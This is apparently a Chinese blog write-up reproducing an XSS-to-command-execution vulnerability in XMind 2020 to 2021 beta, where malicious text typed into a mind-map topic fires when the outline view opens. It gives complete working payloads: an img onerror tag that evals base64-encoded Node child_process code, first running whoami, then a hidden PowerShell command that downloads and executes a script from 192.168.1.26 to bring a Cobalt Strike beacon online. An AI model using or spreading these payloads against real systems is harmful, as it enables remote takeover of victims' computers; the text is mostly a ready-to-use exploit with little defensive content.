简介
XMind 是一款专业的全球领先的商业思维导图软件,在国内使用广泛,拥有强大的功能、包括思维管理、商务演示、与办公软件协同工作等功能。它采用全球先进的Eclipse RCP软件架构,是集思维导图与头脑风暴于一体的可视化思考工具,能用来捕捉想法、理清思路、管理复杂信息并促进团队协作。XMind思维导图软件曾被著名互联网媒体Lifehacker评选为“最佳头脑风暴和思维导图工具”及”最受欢迎的思维导图软件”。
影响范围
XMind 2020—XMind 2021 bate11 都存在此漏洞
漏洞复现
到官网下载最新版本的XMind并安装
打开,测试xss漏洞
创建个模板,在主题中输入,payload,然后点击大纲,在大纲页面保存或者光标移到主题栏然后下移都能触发漏洞
xss payload
1
| <img src=1 onerror=alert(1)>
|
构造执行命令payload
whoami
1 2 3 4 5
| const tenet = require('child_process') tenet.exec('whoami',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
|
base64编码
1
| Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygnd2hvYW1pJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7
|
最终payload
1
| <img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygnd2hvYW1pJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7`,`base64`).toString())'>
|
执行ipconfig /all
cs上线
采用PowerShell上线
1
| powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.26:80/xmind'))"
|
构造执行命令payload
1 2 3 4
| const tenet = require('child_process') tenet.exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.1.26:80/xmind\'))"',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
|
base64编码
1
| Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC4xLjI2OjgwL3htaW5kXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=
|
最终payload
1
| <img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC4xLjI2OjgwL3htaW5kXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>
|
成功上线